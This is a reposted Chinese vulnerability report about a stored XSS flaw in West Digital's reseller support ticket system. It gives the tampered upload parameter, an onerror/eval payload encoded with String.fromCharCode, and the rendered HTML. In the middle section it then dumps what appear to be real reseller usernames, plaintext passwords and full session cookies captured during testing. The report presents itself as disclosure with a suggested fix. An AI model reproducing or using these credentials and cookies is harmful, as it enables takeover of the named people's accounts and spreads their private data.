网站地图    收藏   

主页 > 后端 > 网站安全 >

西部数码储存型xss影响部分代理商 - 网站安全

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 百度 西部数码代理 随意打开个。注册用户 提交问题。改包 将 uploadFileName参数 改为xxx jpgonerror=eval(String fromCharCode(97,108,101,114,116,40,49,41))在 问题跟踪处理 我们可以发现 我们 提...

百度 西部数码代理.随意打开个。
 
 
注册用户 提交问题。
 
改包 将 uploadFileName参数 改为
xxx.jpg"onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
 
 
在 问题跟踪处理 我们可以发现 我们 提交的 代码被处理为 
 
 
<a href="xxx.jpg" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))" "="" target="_blank"><img src="xxx.jpg"onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"" alt="点击看大图" border="0" height="58" width="392"></a>
 
 
<img>标签内双引号被过滤 ,但是 <a>没有 onerror改为onclick即可点击触发。
 
 
 
同时 发现, 代理商如果从登入 http://www.west263.com/ 官网登入时。 
 
<img>内的 双引号并没有被过滤! 导致无需交互就可以触发xss!
同时 这套系统直接把 username password仅用md5加密就保存在 cookie中。按照他的检验机制 我们所获得 "cookie" 是不会过期的。。
 
收到 cookie我就没深入了。。。0.0测试时 所获得的 部分代理商 数据。。
 
账号 rulezhuji
 
密码 ielsndd
 
 
 
xingluren
 
admin888@
 
 
 
cfan0329
 
ver0330
 
 
 
xufeng
 
121325815
 
 
 
soowo
 
218891
 
 
 
 
 
cddgg
 
opt_orderby=desc; Q%5Flastime=2014%2D05%2D07 17%3A13%3A38; secpass=93849c4f002a23f4ce34a5b3138f9484; ASPSESSIONIDACCBRSDC=EGFFCFLABNCOKEMFFPIPIGDE; ASPSESSIONIDACDBTSCC=KILLBEKACJLMGDIGDGCGLPGP; ASPSESSIONIDCCCDSQDD=DGBPDDMABFCJMEJGIJBNLHGJ; ASPSESSIONIDAACCQSCD=GCAADENAEIACCPJHALEKKDCO; onliner_zdfq953501=0; menu_index=2; ASPSESSIONIDACDBRSDC=PFJHHKNAIKMHLICCENHAOEPM; ASPSESSIONIDCABBRTDD=KJHMHLNAOMLGBHBAEFGILEJL; olduser%5F=yes; ASPSESSIONIDACBBRTCD=LJJJOHNACCJHMKDILLDIPPAB; ASPSESSIONIDCCAASTDC=DIDBANOAHFCOGLHKIHCDOLHA; west263%5Fusername=swh2011; cuser%5Fname=cddgg; cuser%5Fpwd=19d9efebf18ed04b; cpanel%5Fpriusername=swh2011; cpanel%5Fpriuserpass=9a700f06568631ba; 53kf_953501_keyword=; kf_953501_keyword_ok=1; Hm_lvt_c7b8362196faf0c1203a46aa4bd2fe82=1399123150,1399336085,1399428994,1399433415; Hm_lpvt_c7b8362196faf0c1203a46aa4bd2fe82=1399452131
 
 
 
snyywzm
 
cpanel%5Fpriuserpass=; cpanel%5Fpriusername=; west263%5Fusername=snyywzm; cuser%5Fname=snyywzm; cuser%5Fpwd=ac86d6823a2603d6; Q%5Flastime=2014%2D05%2D07 16%3A51%3A32; s_pers=%20s_vnum%3D1401414603238%2526vn%253D1%7C1401414603238%3B%20s_fid%3D07CE3F9496014103-0CB3AE4162151D56%7C1461981066234%3B%20s_nr%3D1398822666241%7C1401414666241%3B%20s_invisit%3Dtrue%7C1398824466249%3B; secpass=e8503c7db8ca023e9d629253a14faff5; ASPSESSIONIDACCBRSDC=MBFFCFLAEJKLJFLNGMFFGAHA; ASPSESSIONIDAAAAQTDD=AGHDGDKAGMNIEMDLFNJINPKJ; onliner_zdfq953501=0; olduser%5F=yes; ASPSESSIONIDCCDATSDD=LGPLCJLAPGLNNPIEFNKEGCLB; 53kf_953501_keyword=http%3A//www.west.cn/SetInManager/; kf_953501_keyword_ok=1; cpanel%5Fpriuserpass=ac86d6823a2603d6; cpanel%5Fpriusername=snyywzm; ASPSESSIONIDAACCQSCD=INPPCENAAANEHCAELEEGKFPJ; ASPSESSIONIDCABBTTCD=PBOLHBNADFKHPFPIDBBBNMHG; ASPSESSIONIDACDBRSDC=IAJHHKNAGMIOMAJLEAGIOMJM; ASPSESSIONIDCADCRTCD=ABILJGOAFDFIOJCBMDDOEBKK; cuser%5Fpwd=ac86d6823a2603d6; cuser%5Fname=snyywzm; west263%5Fusername=snyywzm; ASPSESSIONIDCABBRTDD=DLFOHLNALLCPJPDNJIHMOIJO; Hm_lvt_c7b8362196faf0c1203a46aa4bd2fe82=1399346428,1399354692,1399357225,1399423079; Hm_lpvt_c7b8362196faf0c1203a46aa4bd2fe82=1399451737
 
 
 
imatao
 
opt_orderby=desc; idcroom=11; cpanel%5Fpriusername=; cpanel%5Fpriuserpass=; cuser%5Fpwd=567930474823c072; west263%5Fusername=imatao; cuser%5Fname=imatao; Q%5Flastime=2014%2D05%2D07 16%3A50%3A39; istixing%5Ffely%2Ecc=true; s_pers=%20s_fid%3D4BE7100DCA992FF5-24E4F3A89BB2F6C2%7C1461669310779%3B%20s_nr%3D1398510910789%7C1401102910789%3B%20s_vnum%3D1401102910796%2526vn%253D1%7C1401102910796%3B%20s_invisit%3Dtrue%7C1398512710796%3B; istixing%5Fxn%2D%2Dmkrq8ad0uk46a%2Ecom=true; auto%5Fspoolid=3177; secpass=645e8d49362e30ac262080f25b88cbe2; ASPSESSIONIDAAAAQTDD=NJOHHDKABNPMLEOBMOABNLAD; onliner_zdfq953501=0; ASPSESSIONIDACCBRSDC=DFFFCFLAKKDGCMNCNAOJHLJJ; ASPSESSIONIDAACCQSCD=NLPPCENANBFBOKFCAOCEFHAG; ASPSESSIONIDACDBTSCC=BJKLBEKAPADNIEIEMLPBCPPH; ASPSESSIONIDACBBRTCD=GBIJOHNAEDKJDAHBEFIKDBAE; ASPSESSIONIDACDBRSDC=MMIHHKNANJHBCPAHNCJPDIMC; ASPSESSIONIDCABBRTDD=LGPLHLNABLJFIHJPGMEJMBFM; cpanel%5Fpriuserpass=8b5758820a4885dc; cpanel%5Fpriusername=yc122173556; west263%5Fusername=yc122173556; menu_index=2; 53kf_953501_keyword=; kf_953501_keyword_ok=1; cuser%5Fpwd=8b5758820a4885dc; cuser%5Fname=yc122173556; arp_scroll_switch=1; Hm_lvt_c7b8362196faf0c1203a46aa4bd2fe82=1399079373,1399100400,1399163843,1399428838; Hm_lpvt_c7b8362196faf0c1203a46aa4bd2fe82=1399451775; arp_scroll_position=0
 
 
 
yc122173556
 
yc19890304
 
 
 
bjfic
 
123456bj
 
 
 
akbkcklxj
 
liangjun123.com
 
 
 
god
 
51...win
 
 
 
westshenfu
 
eash805
 
 
 
liguangda
 
mymima2012
 
作为一个好少年。发现问题的第一时间 我就报告给乌云鸟。 请通知上述相关广商修改密码。。。.
 
 
修复方案:
修复xss。 最后再把 验证用户机制改下吧。。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论